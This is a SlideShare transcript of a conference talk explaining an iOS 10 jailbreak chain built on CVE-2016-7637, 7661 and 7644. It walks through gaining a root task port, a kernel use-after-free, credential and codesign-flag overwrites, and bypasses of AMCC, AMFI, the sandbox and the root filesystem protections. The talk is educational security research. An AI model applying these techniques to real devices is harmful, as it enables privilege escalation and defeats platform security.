SlideShare une entreprise Scribd logo

Stunning Guards for iOS Jailbreak

CODE BLUE
CODE BLUE

This document discusses methods for jailbreaking iOS devices by exploiting vulnerabilities to escalate privileges and disable security mitigations. It summarizes 3 key steps: 1) Using CVE-2016-7637 and CVE-2016-7661 to perform privilege escalation to root level access via a man-in-the-middle attack on the com.apple.iohideventsystem port. 2) Using CVE-2016-7644, a use-after-free bug, to gain the kernel task port, allowing control of the kernel. 3) Overwriting ipc_port data structures to fake the kernel task port and obtain full kernel write privileges, bypassing security mechanisms like AMCC

Périphériques & matériel
1  sur  70
Télécharger pour lire hors ligne
Take a Jailbreak - Stunning Guards for iOS Jailbreak - Kaoru Otsuka
Who am I • An iOS hacking enthusiast • A first-grade high school student at Waseda University High School
Summary • Escalation to root • Escalation to kernel • Disabling mitigations for post exploitations This talk explains the following 3 Methods
The bugs • Those bugs are found by Ian beer who is at googleprojectzero • CVE-2016-7637
 - Broken kernel mach port name uref handling on iOS/MacOS can lead to privileged port name replacement in other processes • CVE-2016-7644
 - XNU kernel UaF due to lack of locking in set_dp_control_port • CVE-2016-7661
 - MacOS/iOS arbitrary port replacement in powerd
Attack vector • CVE-2016-7637 and CVE-2016-7661 to privilege escalation to root • CVE-2016-7644 to gain the kernel task port • Applying patches to disable a bunch of mitigations
CVE-2016-7637 This vulnerability can be applied to MITM attack 
 and leads us to gain a root task port.
CVE-2016-7637 • The bug is basically a mistake of an buffer overflow checking (but not buffer overflow bug in ipc_right_copyout)
CVE-2016-7637 • What’s the meaning of “pegging”? • Suppose it is to prevent a sort of buffer overflow and wrap around to 0 • But the concept of “pegging” is hardly used in xnu • Can we exploit it?
Mach IPC system • The ports targeting on this exploit are related to ipc_entry Source: “Through the mach portal”, ianbeer https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
CVE-2016-7637 • The point is that
 UREFS count is exceeded at 0xFFFE 
 and send “overflow” message to the target port • The next UREFS count being supposed to be 0xFFFF will result in still retaining the UREFS count being 0xFFFE • So it’s promoted to an out-of-sync vulnerability • Let’s take a look at the inside of this exploit in the next slide
CVE-2016-7637 • The applied technique is sending 0x10000 messages (of the same send right) to the target port • The messages are made to be freed in the process of mach_msg_server (sending invalid messages) • Spraying those malicious messages to target port’s UREFS and they will be freed after they are counted to UREFS • This cause the target port being freed! • Let’s reallocate there and take control of the target port
CVE-2016-7637 • There’s a strategy to mitigate for the reallocation of a port and using it (like Use-After-Free) • “ipc_entry” has an entry of generation number (in “ie_bits”) • Generation number entry consists of 6bits bit field. • Generation number will be checked on the userspace/ kernelspace boundary • Incrementing generation number program is below
CVE-2016-7637 • Generation number is up to 64 (not overlapping) • So we need a primitive that allows us to loop generation number around to match the generation number at 64th reallocating • Exploiting reliably, the target port needs to locate at the approximately middle of the freelist
ipc_entry freelist • It’s a simple LIFO list. • Though the value indicating the next node isn’t an address but an index of “is_table” • Unlinking the entry from freelist, old head becomes our next node
CVE-2016-7637 • This topic is to enhance the reliability for this exploit • Sending N messages (reallocating and freed soon) for the sake of target port to be down the freelist • After that, sending 62 loops of 2N messages to increment target port’s generation number
CVE-2016-7637 • Review this exploit • Carry out the UREFS bug • Sending N messages • Sending 62 loop of 2N messages • Target port’s generation number will have been matched
What’s suitable for the target port? • We need a send right for that port • The kernel ports can’t be consumed since kernel-owned ports are looked up each time (e.g. bad setting for generation number) • launchd is a great service
launchd • com.apple.iohideventsystem can be accessed inside the sandbox and approved to have send right • Thanks to insecurities of Apple, com.apple.iohideventsystem receives the task port from client of it • Man-In-The-Middling the target port to capture the task port gives us root task port
Task port • Task port is assigned per task • Task port can be obtained by task_for_pid though this API is so restricted • If we have the task port, we can do anything on its process.
CVE-2016-7661 • Powerd is a client of com.apple.iohideventsystem • Powerd runs as root • Crashing powerd process (CVE-2016-7661) brings the target port to receive powerd’s task port
This vulnerability leads us to gain kernel task port CVE-2016-7644
ipc_port • ipc_entry has a reference to ipc_port (ie_object) • ipc_entry has only reference for ipc_port object • It’s maintained in zones which allocated by zone allocator
CVE-2016-7644 • This vulnerability is a sort of Use-After-Free • set_dp_control_port is only called from root task port so we can’t use this bug without previous exploiting
CVE-2016-7644 • Threads can race to see the same value for dynamic_pager_control_port and release it • ipc_port_release_send decrements the reference count io_references
How we know the reference count 
 io_references
 hits 0?
CVE-2016-7644 • MIG has the feature named no-more-senders notification to notify us if there’s no ip_srights by ipc_port_release_send
 • The total count of senders ip_srights is decremented as well as the reference count • So we’ll use the advantage to notice when it reaches to 0
no-more-senders • ipc_port_release_send drops one reference and one send right for that port • ipc_notify_no_senders sends port->nsrequest port when port becomes no-more-senders
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries ie_object portA 1 reference 0 send right
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB Making a reference for that port 2 references 1 send right portB has send right to portA though doesn’t receive from portA
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 3 references 2 send right portC PortC will be the receiver of no-more-senders notification
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 3 references 2 send right portC Trigger that bug!
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 2 references 1 send right portC Trigger that bug!
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 1 references 0 send right portC Trigger that bug!
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 1 references 0 send right portC send no-more- We could get the notification so we won the race!
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object portB 1 references 0 send right portC Then, what will happen if the portB will be destroyed?
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries portA ie_object 0 references 0 send right portC Then, what will happen if the portB will be destroyed?
ipc_entry ipc_entry ipc_entry ipc_entry ipc_entry ipc_entries ie_object 0 references 0 send right What’s ie_object pointing to? The ipc_entry->ie_object becomes a dangling pointer!
zalloc • zalloc is a system call that assigns zones corresponding to the size • zalloc have a local freelist per zone • zones are freed by memory pressures or mach_force_zone_gc
CVE-2016-7644 • There are zones for ipc_port as I said before • We allocate a ram_mb*20 number of ports (early ports) • And we alllocate 20 of ports (middle ports) • Finally, we allocate 5000 of ports (late ports) • Not forget to prepare stashed port (corresponding to portB) for all of ports we allocated
CVE-2016-7644 • Causes the bug for each middle ports • Destroy the stashed ports • Eventually we’ve made ipc_entries point into dangling port pointers
CVE-2016-7644 • Make the page be able to reallocate other kind of zones(currently it’s for ipc_ports) to capture the kernel port • We here use another technique to gain kernel task port
Fake ipc_port • Use dangling ipc_ports to retrieve or write ip_context • Overlapping the zone we targeted on using ool_ports • ool_ports will misunderstand ipc_ports members Source: “Through the mach portal”, ianbeer https://bugs.chromium.org/p/project-zero/issues/ attachment?aid=280146
CVE-2016-7644 • We are aiming to get the kernel task port • The kernel task port are supposed to be allocated at bootstrapping kernel which is probably at the first page of ipc_ports • And we can get/set the ip_context of ipc_ports (with mach_port_{set|get}_context)
CVE-2016-7644 • Rewrite the every ip_context of dangling ipc_ports to the addresses which are around the middle of first ipc_ports’ page
 (This is CORE technique of our Jailbreak) • There is a kernelspace to userspace conversion function 
 which converts “port address” to “port object” • Using this conversion, once our dangling ipc_ports’ ipc_context will be rewritten to the address of kernel task ports, the overlapped ool_ports (whose host_port) becomes kernel_task port with some probability! • As a result, the ool_ports can be used for receiving kernel_task_port from userspace tasks. 
 This enables our userspace task to manipulate kernel memory in any way!
Process handling in xnu • Process handling implementation in xnu is similar to one in BSD • There is a great deal of benefits to compromise a couple of values in the exact structure
Privilege Escalation • Most exploits in various platforms likely use this sort of technique • “proc” structure is provided by per process • “allproc” variable holds a single linked list for every process’s “proc” • Rewriting flags and credentials inside “proc” structure!
“proc” structure struct proc { LIST_ENTRY(proc) p_list; /* List of all processes. */ pid_t p_pid; /* Process identifier. (static)*/ void * task; /* corresponding task (static)*/ struct proc * p_pptr; /* Pointer to parent process.(LL) */ pid_t p_ppid; /* process's parent pid number */ pid_t p_pgrpid; /* process group id of the process (LL)*/ uid_t p_uid; gid_t p_gid; uid_t p_ruid; ..... kauth_cred_t p_ucred; /* Process owner's identity. (PUCL) */ ..... uint32_t p_csflags; /* flags for codesign (PL) */ ..... • At first glance, we just rewrite the values “p_uid” and “p_gid” • But these fields are’t used inside the kernel process maintaining system • The real one is inside the “p_ucred” structure!
“kauth_cred_t” • “typedef struct ucred *kauth_cred_t;” • “ucred” structure is the original credential maintainer • So we should do is to copy a highly privileged credential to our process
p_csflags • Flags for codesign • Just a 32bit bitfield • Attributes are defined in bsd/sys/codesign.h • Editing several values to allow/deny options
p_csflags • flag |= CS_PLATFORM_BINARY|CS_INSTALLER| CS_GET_TASK_ALLOW • This allows us to obtain a task from another process • flag &= ~(CS_RESTRICT|CS_KILL|CS_HARD); • Omitting complicated options
• Until 2 months ago, it was called KPP but now it is called KTRR or AMCC • The most annoying mitigation for jailbreakers • Based on arm’s TrustZone technology • As of xnu-4570.1.46, it became partially open-sourced (there seems no sync_handler implementation) AMCC
AMCC • There are 4 privilege level being established in Trustzone • EL0 - User-space programs are running here • EL1- Kernel and iBoot(Bootloader) • EL2 - Unused in iOS • EL3 - AMCC/KTRR
AMCC • AMCC’s strategy is the kernel regions with read-only or read|exec-only permissions to be guaranteed unmodified • If these regions are determined as an invalid region, AMCC causes kernel panic • Bypass the regions checking loop so that giving us to write anywhere
AMCC • In theory, it is inevitable • Though in practice, it is not inevitable • Let’s get started into arm abyss!
AMCC • AMCC needs to retrieve several system registers to know the kernel space states or user space states • We can set these registers if we have kernel execution
System Registers • TTBR1_EL1
 The TTBR1_EL1 controls the base address of translation table 1
 • CPACR_EL1
 The CPACR_EL1 controls access to floating-point, and Advanced SIMD functionality from EL0, EL1, and EL3.
 The flag register “CPACR_EL1.FPEN” called “NEON” determines if it traps
The loop EL0 FPU Execution EL3 Executes sync_handler EL0 or EL1 IRQ Execution EL3 Executes Watchtower
sync_handler • It’s the core of AMCC • Supposed it checks KTRR regions integrity and registers integrity • If there’s invalid pages it will trigger kernel panic • It sets CPACR_EL1 to not to trap FPU instruction
Watchtower • It will be called by IRQ instruction • Its source is located at osfmk/arm64/locore.s • Restoring a bunch of register and CPACR_EL1 to trap any instruction in EL0 and EL1
The solution • Referred to @qwertyoruiopz Yalu102 jailbreak • 1st, load dummy Translation Table Base address to TTBR1_EL1 • 2nd, hit CPACR_EL1 not to be trapped by EL3
 (but it triggers check on EL3 now) • 3rd, load fake Translation Table Base address to TTBR1_EL1 • 4th, executes “tlbi vmalle1” to invalidate all stage 1 translations • And patching instruction touching cpacr to nop
The solution • The code is below
Shadowmapping technique • gVirtbase - virtual address of translation table entries • gPhybase - physical address of translation table entries • Both of them is stored in pmap structure • The technique is replacing original Translation Table Entry to our fake Translation Table Entry so that giving us write permission to executable pages
Problem • TTBR_EL1 will be reset to 0 on sleeping • There are 2 kinds of sleeping • Idle sleep 
 sleeping when cpu is idle • Deep sleep
 sleeping when the screen has been black out for more than 30 seconds • The state of them is stored in “struct cpu_data>interrupt_handler”
AMFI • Apple Mobile File Integrity • Exist as a daemon and a kext • The reason why it is targeted by attacker is that its kext audits the binary’s entitlements, code signing and MAC(Mandatory Access Control) policy
PE_i_can_has_debugger • Patching a1 for the function to always return true • If the function always returns true, many of the checks in the kernel will turn off
Disabling sandbox • MAC policies are stored at “mac_policy_conf->mac_ops” • These policies needs to be disable for jailbreaking • Just rewrite those pointers to be null
LwVM • Light-weight Volume Manager • LwVM wraps GPT • _mapForIO traps the root partition writing • Partition object which mark it lock by a flag is held on heap • Removing this flag to write anywhere in the root partition
Remount rootfs • mac_mount prevents mounting root partition as r/w • Bypassing this protection is as the same doing as we did in LwVM • vnode(checked every mounting on) have a flag • Remove that flag and remounting root partition
References • Through the mach portal (by ian beer) • yalu102 (by Luca Todesco) • iOS 10 Kernel Heap Revisited (by Stefan Esser) • Mac OS X and iOS Internals (by Jonathan Levin)
Demo Tested on iOS10.1.1 iPhone5s

Recommandé

For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...CODE BLUE
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CanSecWest
 

Recommandé

For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...CODE BLUE
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CanSecWest
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCanSecWest
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLPositive Hack Days
 
Behind modern concurrency primitives
Behind modern concurrency primitivesBehind modern concurrency primitives
Behind modern concurrency primitivesBartosz Sypytkowski
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the CorePeter Hlavaty
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016Susan Potter
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patternsPeter Hlavaty
 
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueChong-Kuan Chen
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)inaz2
 
Ricon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak PipeRicon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak PipeSusan Potter
 
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in LinuxSelf Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linuxinaz2
 
C++ scalable network_io
C++ scalable network_ioC++ scalable network_io
C++ scalable network_ioArindam Mukherjee
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminskyDan Kaminsky
 

Contenu connexe

Tendances

One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCanSecWest
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLPositive Hack Days
 
Behind modern concurrency primitives
Behind modern concurrency primitivesBehind modern concurrency primitives
Behind modern concurrency primitivesBartosz Sypytkowski
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016Susan Potter
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patternsPeter Hlavaty
 
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueChong-Kuan Chen
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)inaz2
 
Ricon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak PipeRicon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak PipeSusan Potter
 
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in LinuxSelf Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linuxinaz2
 

Tendances (20)

One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
 
Статический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDLСтатический анализ кода в контексте SSDL
Статический анализ кода в контексте SSDL
 
Behind modern concurrency primitives
Behind modern concurrency primitivesBehind modern concurrency primitives
Behind modern concurrency primitives
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patterns
 
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...Industroyer: biggest threat to industrial control systems since Stuxnet by An...
Industroyer: biggest threat to industrial control systems since Stuxnet by An...
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
Abusing Interrupts for Reliable Windows Kernel Exploitation (en)
 
Ricon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak PipeRicon/West 2013: Adventures with Riak Pipe
Ricon/West 2013: Adventures with Riak Pipe
 
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in LinuxSelf Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
Self Introduction & The Story that I Tried to Make Sayonara ROP Chain in Linux
 

Similaire à Stunning Guards for iOS Jailbreak

Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminskyDan Kaminsky
 
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSignalSEC Ltd.
 
Basic buffer overflow part1
Basic buffer overflow part1Basic buffer overflow part1
Basic buffer overflow part1Payampardaz
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Cysinfo Cyber Security Community
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
 
Nous Sommes Cyber - HTB Blue
